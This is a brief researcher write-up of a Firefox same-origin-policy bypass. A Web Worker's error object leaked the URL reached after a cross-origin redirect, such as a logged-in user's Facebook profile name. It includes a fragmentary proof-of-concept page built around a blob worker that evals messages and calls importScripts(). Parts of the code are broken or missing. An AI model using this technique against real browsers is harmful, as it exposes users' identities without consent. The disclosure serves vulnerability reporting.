FireFox SOP bypass Using Workers

Whilst investigating the Worker implementation in Firefox, I noticed that some information leak is happening. Basically, if you go to a URL like (assuming you're logged in) you will get redirected to your own facebook page, which usually contains your name in the URL itself.
And in the worker we basically did a try-catch and then I noticed the error object passed had a bit more information than what I noticed in a normal context, I was able to get the URL name after redirection when its supposed to only show the initial URL.

Original PoC code:

<!DOCTYPE html>
			<title>SOP bypass using workers - Sensitive data retrieval PoC - Abdulrahman Alqabandi</title>
			<script type="application/javascript">
					//Our worker. onerror=>log(error) && onmsg=>eval(msg)
					var workerText='onerror=function(q){console.log("err"+q);};onmessage=function(q){console.log("Will eval:";eval(};';
					//Create our worker with some blob: url.
					var qWorker=new Worker(URL.createObjectURL(new Blob([workerText])));
					//Alert any data recieved by our new worker
					//This is the vulnerable part.
					//The importScripts() function does not check cross-origins and will try to execute any data returned by the xorigin url.
					//However, if we catch an error, the URL is exposed in the error object(after redirection). 
			<input type="button" value="Get my facebook name!" id="qab">

Although the report is valid, it was a duplication.


The Bugzilla report: